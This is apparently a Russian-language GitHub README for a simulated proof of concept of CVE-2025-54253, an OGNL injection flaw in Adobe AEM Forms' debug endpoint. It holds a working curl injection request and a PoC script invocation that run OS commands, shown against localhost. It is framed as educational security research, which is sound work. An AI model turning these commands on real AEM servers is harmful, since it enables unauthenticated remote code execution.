
Симулированный PoC для CVE-2025-54253: уязвимость внедрения OGNL в Adobe AEM
CVE-2025-54253 — это критическая уязвимость внедрения OGNL в Adobe AEM Forms на JEE. Она позволяет неавторизованным злоумышленникам выполнять произвольные команды операционной системы через конечную точку /adminui/debug?debug=OGNL:.
Эта уязвимость находится в открытом интерфейсе отладки, который выполняет контролируемые пользователем выражения OGNL без должной очистки или аутентификации. Ее эксплуатация может привести к удаленному выполнению кода в контексте сервера приложений.
📝 Примечание: Эта уязвимость затрагивает установки, которые открывают конечную точку
/adminui/debugпублично или внутри сети без надлежащего контроля доступа.
Простые выражения OGNL демонстрируют выполнение команд через браузер или curl.
curl "http://localhost:4502/adminui/debug?debug=OGNL:whoami"
python3 poc/cve-2025-54253-poc.py --url http://127.0.0.1:4502 --cmd "whoami"
Скрипт записывает вывод выполнения команд в exploit.log:
Настройте уязвимый экземпляр Adobe AEM (<= 6.5.23.0).
Запустите сервер Flask (при локальном моделировании):

Выполните OGNL в браузере:

Выполните через curl:

Вывод команд:



Вид журнала Flask:

Запуск скрипта PoC:

Подробный вид журнала:

/adminui/debug⚠️ Отказ от ответственности: Данный PoC предназначен только для образовательных целей. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Shivshant Patil
Сертифицированный этичный хакер (CEH v13)
Выпускник по специальности «Компьютерная инженерия» (бакалавр)
🔗 LinkedIn
🔗 GitHub